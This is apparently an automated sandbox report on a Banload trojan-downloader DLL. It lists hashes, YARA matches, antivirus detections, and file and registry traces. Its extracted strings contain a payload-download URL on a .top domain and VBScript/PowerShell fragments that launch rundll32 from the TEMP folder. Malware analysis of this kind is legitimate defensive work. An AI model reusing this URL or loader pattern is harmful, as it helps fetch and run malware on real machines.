Report #6881 check_circle

Binary
DLL
False cancel
Size
943.00KB
trid
58.7% Win32 EXE PECompact compressed
14.1% DOS Borland compiled Executable
9.2% Win32 Dynamic Link Library
6.3% Win32 Executable
2.9% Win16/32 Executable Delphi generic
type
PE
wordsize
32
Subsystem
Windows GUI
Hashes
md5
caaa6c62bfb3a656a0c1df9672a7ed76
sha1
c50abadfbfcb6118327e20a9204abd89416412a2
crc32
0x3c88591a
sha224
1997f4e339b018a704624864fb0d834181938eafb3904ce2a704d20f
sha256
2c470624994f885f25ca75ef8f0411f7db0a263e9c83f6c83390bbe662fcbaa8
sha384
b45bcda63619248ae5bbf89a582065bf62242df215d1f0a46924642a6942ba2607ed986bc4c6bed9376281283670186c
sha512
98b62b180ebf2214c7444c4fee4670d7459252c81b3e8136860f38e6b273b65b5878353d71e07e0797e98624706e2f66960926baadc4d03c746e65645444388e
ssdeep
24576:nygs7ajRp+gNQOjy1xsf+3vQBqSbyz5y26GT4vez:ygGWp6JYsSyy25T4vez
Community
Google
False cancel
HashLib
False cancel
YARA
Matches
domain, Borland, IP, Borland_Delphi_30_, network_dropper, CRC32_poly_Constant, borland_delphi, Delphi_FormShow, CRC32_table, Microsoft_Visual_Cpp_v50v60_MFC, win_files_operation, IsPE32, win_hook, contentis_base64, screenshot, Borland_Delphi_v40_v50, Borland_Delphi_40_additional, win_mutex, keylogger, Borland_Delphi_40, IsWindowsGUI, anti_dbg, Borland_Delphi_Setup_Module, Borland_Delphi_DLL, url, win_registry, Borland_Delphi_30_additional, Borland_Delphi_v30, System_Tools

Suspicious
True check_circle

Strings
List
http://www.fi-deli-dade.top/dudu.jpg
t.Ht
Font.Style
Font.Name
objShell.run(rundll),0
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
Uh.cC
h.QA
Set objShell = CreateObject("WScript.Shell")
rundll = "PowerShell cd $env:TEMP ;Start-Process rundll32.exe " & "
B.rsrc
Delphi%.8X
Software\Borland\Locales
Software\Borland\Delphi\Locales
winspool.drv
winspool.drv
comctl32.dll
msimg32.dll
msimg32.dll
comctl32.dll
comctl32.dll
comctl32.dll
comctl32.dll
version.dll
uxtheme.dll
uxtheme.dll
urlmon.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
Spanish (Spain)
ControlOfs%.8X%.8X
WndProcPtr%.8X%.8X
name="Microsoft.Windows.Common-Controls"
Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread The specified file was not found
tsThumbBtnVertPressed
tsUpperTrackVertPressed
tsGripperVertPressed
9%9E9T9o9s9
9%9A9R9f9n9
Reserved3
DefocusControl
Software\CodeGear\Locales
dsNormal dsPressed
Apartment
HandleAllocated
HandleAllocated
HandleAllocated
HandleAllocated
HandleAllocated
HandleAllocated
FTerminated
tpDownPressed
Sub-menu is not in menu
tpUpPressed
%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Division by zero
Stage
Next
Next
UhBrA
Bloq May
UhBfA
Next
Next
List
Count
Count
Bloq May
UhBYA
French
List
Count
Next
Delete
Delete
Count
Count
Count
Count
Count
Count
Delete
Count
Count
Next
Delete
Next
Writer
Delete
Count
Delete
Delete
Count
Delete
Count
Count
Delete
Writer
Delete
Count

Foremost
Matches
0.exe, 943 KB
Suspicious
True check_circle
Heuristics
IPs
hasIPs: False cancel
Allowed
Suspicious
hasAllowed: False cancel
hasSuspicious: False cancel

URLs
Allowed
hasURLs: True check_circle
Suspicious: http://www.fi-deli-dade.top/dudu.jpg
hasAllowed: False cancel
hasSuspicious: True check_circle

Files
Allowed: ole32.dll, msimg32.dll, USER32.DLL, imm32.dll, kernel32.dll, oleaut32.dll, uxtheme.dll, comctl32.dll, gdi32.dll, urlmon.dll, DWMAPI.DLL, advapi32.dll, version.dll
hasFiles: True check_circle
Suspicious
hasAllowed: True check_circle
hasSuspicious: False cancel

Binary
Sizes
RVA
RVA: 16
Suspicious: False cancel
Code
Size: 169984
Suspicious: False cancel
Image
Address: 4194304
Suspicious: False cancel
Stack
Stack: 16384
Suspicious: False cancel
Headers
Headers: 1024
Suspicious: False cancel
Suspicious: False cancel

Symbols
Number
Number: 0
Suspicious: True check_circle
Pointer
Pointer: 0
Suspicious: True check_circle
Directories
Number: 16
Suspicious: False cancel

Checksum
Value: 0
Suspicous: True check_circle

Sections
Allowed: .text, .itext, .data, .bss, .idata, .didata, .tls, .rdata, .reloc, .rsrc
Suspicious
hasAllowed: True check_circle
hasSections: True check_circle
hasSuspicious: False cancel

Versions
OS
Version: 5
Suspicious: False cancel
Image
Version: True check_circle
Suspicious: 5
Linker
Version: 2.25
Suspicious: False cancel
Subsystem
Version: 5.0
Suspicious: False cancel
Suspicious: False cancel

EntryPoint
Address: 797912
Suspicious: False cancel

Anomalies
Anomalies: The header checksum and the calculated checksum do not match.
hasAnomalies: True check_circle

Libraries
Allowed: ole32.dll, msimg32.dll, user32.dll, imm32.dll, kernel32.dll, oleaut32.dll, uxtheme.dll, comctl32.dll, gdi32.dll, urlmon.dll, dwmapi.dll, advapi32.dll, version.dll
hasLibs: True check_circle
Suspicious
hasAllowed: True check_circle
hasSuspicious: False cancel

Timestamp
Past: False cancel
Valid: True check_circle
Value: 2017-11-06 17:52:26
Future: False cancel

Compilation
Packed: False cancel
Missing: False cancel
Packers
Compiled: True check_circle
Compilers: Borland Delphi 3.0 (???), Borland Delphi 4.0, Borland Delphi v6.0 - v7.0

Obfuscation
XOR: False cancel
Fuzzing: False cancel

PEDetector
Matches
None
Suspicious
False cancel
Disassembly
hasTricks
True check_circle
Tricks
pushret
.data: 8
.text: 27
.itext: 4
.reloc: 1

pushpopmath
.data: 4
.rsrc: 3
.text: 13
.reloc: 46

ss register
.reloc: 1

garbagebytes
.data: 3
.text: 21
.itext: 4
.reloc: 1

hookdetection
.text: 2

software breakpoint
.text: 2
.reloc: 18

programcontrolflowchange
.data: 3
.text: 21
.itext: 4
.reloc: 1

cpuinstructionsresultscomparison
.data: 5
.rsrc: 1
.text: 16

AVclass
banload
1
VirusTotal
md5
caaa6c62bfb3a656a0c1df9672a7ed76
sha1
c50abadfbfcb6118327e20a9204abd89416412a2
SCANS (DETECTION RATE = 61.19%)
AVG
result: Win32:Malware-gen
update: 20180215
version: 18.1.3800.0
detected: True check_circle

CMC
update: 20180215
version: 1.1.0.977
detected: False cancel

MAX
result: malware (ai score=98)
update: 20180215
version: 2017.11.15.1
detected: True check_circle

Bkav
update: 20180212
version: 1.3.0.9466
detected: False cancel

K7GW
result: Trojan-Downloader ( 005110381 )
update: 20180215
version: 10.40.26215
detected: True check_circle

ALYac
result: Trojan.GenericKD.6167764
update: 20180215
version: 1.1.1.5
detected: True check_circle

Avast
result: Win32:Malware-gen
update: 20180215
version: 18.1.3800.0
detected: True check_circle

Avira
result: TR/Dldr.Banload.wdonf
update: 20180215
version: 8.3.3.6
detected: True check_circle

Baidu
update: 20180208
version: 1.0.0.2
detected: False cancel

Cyren
result: W32/Trojan.EDBG-2540
update: 20180215
version: 5.4.30.7
detected: True check_circle

DrWeb
update: 20180215
version: 7.0.28.2020
detected: False cancel

GData
result: Trojan.GenericKD.6167764
update: 20180215
version: A:25.16037B:25.11588
detected: True check_circle

Panda
result: Trj/GdSda.A
update: 20180214
version: 4.6.4.2
detected: True check_circle

VBA32
update: 20180215
version: 3.12.28.0
detected: False cancel

VIPRE
result: Trojan.Win32.Generic!BT
update: 20180215
version: 64612
detected: True check_circle

Zoner
update: 20180215
version: 1.0
detected: False cancel

AVware
result: Trojan.Win32.Generic!BT
update: 20180215
version: 1.5.0.42
detected: True check_circle

ClamAV
update: 20180215
version: 0.99.2.0
detected: False cancel

Comodo
update: 20180215
detected: False cancel

F-Prot
update: 20180215
version: 4.7.1.166
detected: False cancel

Ikarus
result: Trojan-Downloader.Win32.Banload
update: 20180215
version: 0.1.5.2
detected: True check_circle

McAfee
result: GenericRXCR-WG!CAAA6C62BFB3
update: 20180215
version: 6.0.6.653
detected: True check_circle

Rising
result: Spyware.Banker!8.8D (TFE:4:TGEM7PPzkHN)
update: 20180215
version: 25.0.0.1
detected: True check_circle

Sophos
result: Mal/Generic-S
update: 20180215
version: 4.98.0
detected: True check_circle

Yandex
result: PUA.Agent!
update: 20180214
version: 5.5.1.3
detected: True check_circle

Zillya
result: Downloader.Banload.Win32.84079
update: 20180214
version: 2.0.0.3491
detected: True check_circle

Arcabit
result: Trojan.Generic.D5E1CD4
update: 20180215
version: 1.0.0.830
detected: True check_circle

Cylance
update: 20180215
version: 2.3.1.101
detected: False cancel

Endgame
result: malicious (high confidence)
update: 20180214
version: 1.2.0
detected: True check_circle

Tencent
result: Win32.Adware.Generic.Tays
update: 20180215
version: 1.0.0.1
detected: True check_circle

ViRobot
update: 20180215
version: 2014.3.20.0
detected: False cancel

Webroot
update: 20180215
version: 1.0.0.207
detected: False cancel

eGambit
update: 20180215
version: v4.3.4
detected: False cancel

Ad-Aware
result: Trojan.GenericKD.6167764
update: 20180215
version: 3.0.3.1010
detected: True check_circle

AegisLab
update: 20180215
version: 4.2
detected: False cancel

Emsisoft
result: Trojan.GenericKD.6167764 (B)
update: 20180215
version: 4.0.2.899
detected: True check_circle

F-Secure
result: Trojan.GenericKD.6167764
update: 20180215
version: 11.0.19100.45
detected: True check_circle

Fortinet
result: W32/Banload.WYI!tr
update: 20180215
version: 5.4.247.0
detected: True check_circle

Invincea
update: 20180121
version: 6.3.4.26036
detected: False cancel

Jiangmin
update: 20180215
version: 16.0.100
detected: False cancel

Kingsoft
update: 20180215
version: 2013.8.14.323
detected: False cancel

Paloalto
result: generic.ml
update: 20180215
version: 1.0
detected: True check_circle

Symantec
result: Trojan.Gen.2
update: 20180215
version: 1.5.0.0
detected: True check_circle

nProtect
update: 20180215
version: 2018-02-15.02
detected: False cancel

AhnLab-V3
result: Trojan/Win32.Banload.C2265887
update: 20180214
version: 3.11.3.19504
detected: True check_circle

Kaspersky
result: not-a-virus:HEUR:AdWare.Win32.Generic
update: 20180215
version: 15.0.1.13
detected: True check_circle

Microsoft
update: 20180215
version: 1.1.14500.5
detected: False cancel

Qihoo-360
result: Win32/Virus.Adware.b51
update: 20180215
version: 1.0.0.1120
detected: True check_circle

TheHacker
update: 20180213
version: 6.8.0.5.2403
detected: False cancel

ZoneAlarm
result: not-a-virus:HEUR:AdWare.Win32.Generic
update: 20180215
version: 1.0
detected: True check_circle

Cybereason
result: malicious.2bfb3a
update: 20180205
version: 1.2.27
detected: True check_circle

ESET-NOD32
result: a variant of Win32/TrojanDownloader.Banload.XZR
update: 20180215
version: 16908
detected: True check_circle

TrendMicro
result: TROJ_GEN.R002C0PK817
update: 20180215
version: 9.862.0.1074
detected: True check_circle

WhiteArmor
update: 20180205
detected: False cancel

BitDefender
result: Trojan.GenericKD.6167764
update: 20180215
version: 7.2
detected: True check_circle

CrowdStrike
result: malicious_confidence_80% (W)
update: 20170201
version: 1.0
detected: True check_circle

K7AntiVirus
result: Trojan-Downloader ( 005110381 )
update: 20180215
version: 10.40.26219
detected: True check_circle

SentinelOne
update: 20180115
version: 1.0.12.202
detected: False cancel

Avast-Mobile
update: 20180215
version: 180215-00
detected: False cancel

Malwarebytes
update: 20180215
version: 2.1.1.1115
detected: False cancel

TotalDefense
update: 20180215
version: 37.1.62.1
detected: False cancel

CAT-QuickHeal
result: Trojan.Generic
update: 20180215
version: 14.00
detected: True check_circle

NANO-Antivirus
result: Riskware.Win32.Banload.evbcqc
update: 20180215
version: 1.0.100.21498
detected: True check_circle

MicroWorld-eScan
result: Trojan.GenericKD.6167764
update: 20180215
version: 14.0.297.0
detected: True check_circle

SUPERAntiSpyware
update: 20180215
version: 5.6.0.1032
detected: False cancel

McAfee-GW-Edition
result: BehavesLike.Win32.AdwareDealPly.dh
update: 20180215
version: v2015
detected: True check_circle

TrendMicro-HouseCall
result: TROJ_GEN.R002C0PK817
update: 20180215
version: 9.950.0.1006
detected: True check_circle

total
67
sha256
2c470624994f885f25ca75ef8f0411f7db0a263e9c83f6c83390bbe662fcbaa8
scan_id
2c470624994f885f25ca75ef8f0411f7db0a263e9c83f6c83390bbe662fcbaa8-1518691081
resource
caaa6c62bfb3a656a0c1df9672a7ed76
positives
41
scan_date
2018-02-15 10:38:01
verbose_msg
Scan finished, information embedded
response_code
1
File
Trace
19/2/2020 - 19:45:43.872Open1480C:\malware.exeC:\Windows\Fonts\mingliu.ttc
19/2/2020 - 19:45:44.12Open1480C:\malware.exeC:\Windows\Fonts\mingliu.ttc
19/2/2020 - 19:45:44.247Open1480C:\malware.exeC:\Windows\Fonts\simsun.ttc
19/2/2020 - 19:45:44.247Open1480C:\malware.exeC:\Windows\Fonts\simsun.ttc
19/2/2020 - 19:45:44.247Open1480C:\malware.exeC:\Windows\Fonts\gulim.ttc
19/2/2020 - 19:45:44.481Open1480C:\malware.exeC:\Windows\Fonts\gulim.ttc
19/2/2020 - 19:45:44.809Open1480C:\malware.exeC:\
19/2/2020 - 19:45:44.809Unknown1480C:\malware.exeC:\
19/2/2020 - 19:45:44.809Open1480C:\malware.exeC:\api-ms-win-downlevel-shlwapi-l2-1-0.dll
19/2/2020 - 19:45:44.809Open1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
19/2/2020 - 19:45:44.809Unknown1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dllapi-ms-win-downlevel-shlwapi-l2-1-0.dll
19/2/2020 - 19:45:44.809Open1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
19/2/2020 - 19:45:44.809Unknown1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dllapi-ms-win-downlevel-shlwapi-l2-1-0.dll
19/2/2020 - 19:45:44.825Open1480C:\malware.exeC:\Secur32.dll
19/2/2020 - 19:45:44.825Open1480C:\malware.exeC:\Windows\SysWOW64\secur32.dll
19/2/2020 - 19:45:44.825Open1480C:\malware.exeC:\Windows\SysWOW64\secur32.dll
19/2/2020 - 19:45:44.872Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
19/2/2020 - 19:45:44.872Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
19/2/2020 - 19:45:44.872Open1480C:\malware.exeC:\api-ms-win-downlevel-advapi32-l2-1-0.dll
19/2/2020 - 19:45:44.872Open1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll
19/2/2020 - 19:45:44.872Unknown1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dllapi-ms-win-downlevel-advapi32-l2-1-0.dll
19/2/2020 - 19:45:44.872Open1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll
19/2/2020 - 19:45:44.872Unknown1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dllapi-ms-win-downlevel-advapi32-l2-1-0.dll
19/2/2020 - 19:45:44.918Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
19/2/2020 - 19:45:44.918Open1480C:\malware.exeC:\Windows\SysWOW64\winhttp.dll
19/2/2020 - 19:45:44.918Open1480C:\malware.exeC:\Windows\SysWOW64\winhttp.dll
19/2/2020 - 19:45:44.918Open1480C:\malware.exeC:\Windows\SysWOW64\webio.dll
19/2/2020 - 19:45:44.918Open1480C:\malware.exeC:\Windows\SysWOW64\webio.dll
19/2/2020 - 19:45:44.918Open1480C:\malware.exeC:\IPHLPAPI.DLL
19/2/2020 - 19:45:44.918Open1480C:\malware.exeC:\Windows\SysWOW64\IPHLPAPI.DLL
19/2/2020 - 19:45:44.918Open1480C:\malware.exeC:\Windows\SysWOW64\IPHLPAPI.DLL
19/2/2020 - 19:45:44.918Open1480C:\malware.exeC:\WINNSI.DLL
19/2/2020 - 19:45:44.918Open1480C:\malware.exeC:\Windows\SysWOW64\winnsi.dll
19/2/2020 - 19:45:44.918Open1480C:\malware.exeC:\Windows\SysWOW64\winnsi.dll
19/2/2020 - 19:45:44.918Open1480C:\malware.exeC:\DNSAPI.dll
19/2/2020 - 19:45:44.918Open1480C:\malware.exeC:\Windows\SysWOW64\dnsapi.dll
19/2/2020 - 19:45:44.918Open1480C:\malware.exeC:\Windows\SysWOW64\dnsapi.dll
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Windows\SysWOW64\mswsock.dll
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Windows\SysWOW64\mswsock.dll
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Windows\SysWOW64\wship6.dll
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Windows\SysWOW64\wship6.dll
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot
19/2/2020 - 19:45:44.981Unknown1480C:\malware.exeC:\Users\Behemot
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
19/2/2020 - 19:45:44.981Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
19/2/2020 - 19:45:44.981Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
19/2/2020 - 19:45:44.981Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot
19/2/2020 - 19:45:44.981Unknown1480C:\malware.exeC:\Users\Behemot
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming
19/2/2020 - 19:45:44.981Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
19/2/2020 - 19:45:44.981Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
19/2/2020 - 19:45:44.981Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot
19/2/2020 - 19:45:44.981Unknown1480C:\malware.exeC:\Users\Behemot
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
19/2/2020 - 19:45:44.981Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
19/2/2020 - 19:45:44.981Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
19/2/2020 - 19:45:44.981Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History\History.IE5
19/2/2020 - 19:45:44.981Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History\History.IE5
19/2/2020 - 19:45:45.90Open1480C:\malware.exeC:\Windows\SysWOW64\netprofm.dll
19/2/2020 - 19:45:45.90Open1480C:\malware.exeC:\Windows\SysWOW64\netprofm.dll
19/2/2020 - 19:45:45.90Open1480C:\malware.exeC:\Windows\SysWOW64\nlaapi.dll
19/2/2020 - 19:45:45.90Open1480C:\malware.exeC:\Windows\SysWOW64\nlaapi.dll
19/2/2020 - 19:45:45.137Open1480C:\malware.exeC:\dhcpcsvc6.DLL
19/2/2020 - 19:45:45.137Open1480C:\malware.exeC:\Windows\SysWOW64\dhcpcsvc6.dll
19/2/2020 - 19:45:45.137Unknown1480C:\malware.exeC:\Windows\SysWOW64\dhcpcsvc6.dlldhcpcsvc6.dll
19/2/2020 - 19:45:45.137Open1480C:\malware.exeC:\Windows\SysWOW64\dhcpcsvc6.dll
19/2/2020 - 19:45:45.137Unknown1480C:\malware.exeC:\Windows\SysWOW64\dhcpcsvc6.dlldhcpcsvc6.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\WSHTCPIP.DLL
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\WSHTCPIP.DLL
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\dhcpcsvc.DLL
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\dhcpcsvc.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\dhcpcsvc.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\CRYPTSP.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\cryptsp.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\cryptsp.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\RpcRtRemote.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\RpcRtRemote.dll
19/2/2020 - 19:45:45.184Unknown1480C:\malware.exeC:\Windows\SysWOW64\RpcRtRemote.dllRpcRtRemote.dll
19/2/2020 - 19:45:45.184Open1480C:\malware.exeC:\Windows\SysWOW64\RpcRtRemote.dll
19/2/2020 - 19:45:45.184Unknown1480C:\malware.exeC:\Windows\SysWOW64\RpcRtRemote.dllRpcRtRemote.dll
19/2/2020 - 19:45:45.247Open1480C:\malware.exeC:\rasadhlp.dll
19/2/2020 - 19:45:45.247Open1480C:\malware.exeC:\Windows\SysWOW64\rasadhlp.dll
19/2/2020 - 19:45:45.247Open1480C:\malware.exeC:\Windows\SysWOW64\rasadhlp.dll
19/2/2020 - 19:45:45.293Open1480C:\malware.exeC:\Windows\SysWOW64\npmproxy.dll
19/2/2020 - 19:45:45.293Open1480C:\malware.exeC:\Windows\SysWOW64\npmproxy.dll
19/2/2020 - 19:45:46.403Open1480C:\malware.exeC:\Windows\SysWOW64\wininet.dll
19/2/2020 - 19:45:46.403Open1480C:\malware.exeC:\Windows\SysWOW64\wininet.dll
19/2/2020 - 19:45:47.12Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\Tgs_PcEEEB3BEDb.hlp
19/2/2020 - 19:45:47.12Open1480C:\malware.exeC:\Windows\SysWOW64\pt-BR\KernelBase.dll.mui
19/2/2020 - 19:45:47.28Open1480C:\malware.exeC:\imageres.dll
19/2/2020 - 19:45:47.28Open1480C:\malware.exeC:\Windows\SysWOW64\imageres.dll
19/2/2020 - 19:45:47.28Open1480C:\malware.exeC:\Windows\SysWOW64\imageres.dll
19/2/2020 - 19:45:47.28Open1480C:\malware.exeC:\Windows\SysWOW64\pt-BR\imageres.dll.mui
19/2/2020 - 19:45:47.28Open1480C:\malware.exeC:\Windows\System32\pt-BR\imageres.dll.mui
19/2/2020 - 19:45:47.28Open1480C:\malware.exeC:\Windows\SysWOW64\pt\imageres.dll.mui
19/2/2020 - 19:45:47.28Open1480C:\malware.exeC:\Windows\SysWOW64\en-US\imageres.dll.mui
19/2/2020 - 19:45:47.28Read1480C:\malware.exeC:\Windows\SysWOW64\en-US\imageres.dll.muiimageres.dll.mui
19/2/2020 - 19:45:47.28Open1480C:\malware.exeC:\Windows\SysWOW64\ole32.dll
19/2/2020 - 19:45:47.28Open1480C:\malware.exeC:\Windows\SysWOW64\ole32.dll

Process
Trace

Analysis
Reason
Timeout

Status
Sucessfully Executed

Results
1

Registry
Trace
19/2/2020 - 19:45:44.918Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapProxyBypass
19/2/2020 - 19:45:44.918Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapIntranetName
19/2/2020 - 19:45:44.918Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapUNCAsIntranet
19/2/2020 - 19:45:44.918Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapAutoDetect
19/2/2020 - 19:45:44.918Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapProxyBypass
19/2/2020 - 19:45:44.918Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapIntranetName
19/2/2020 - 19:45:44.918Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapUNCAsIntranet
19/2/2020 - 19:45:44.918Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapAutoDetect
19/2/2020 - 19:45:44.918Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnable
19/2/2020 - 19:45:44.918Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyServer
19/2/2020 - 19:45:44.918Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyOverride
19/2/2020 - 19:45:44.918Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsAutoConfigURL
19/2/2020 - 19:45:44.918Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsAutoDetect
19/2/2020 - 19:45:44.918Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectionsSavedLegacySettings
19/2/2020 - 19:45:44.981Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ContentCachePrefix
19/2/2020 - 19:45:44.981Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\CookiesCachePrefix
19/2/2020 - 19:45:44.981Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\HistoryCachePrefix
19/2/2020 - 19:45:45.340Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionReason
19/2/2020 - 19:45:45.340Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionTime
19/2/2020 - 19:45:45.340Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecision
19/2/2020 - 19:45:45.340Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDetectedUrl
19/2/2020 - 19:45:46.637Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDecisionReason
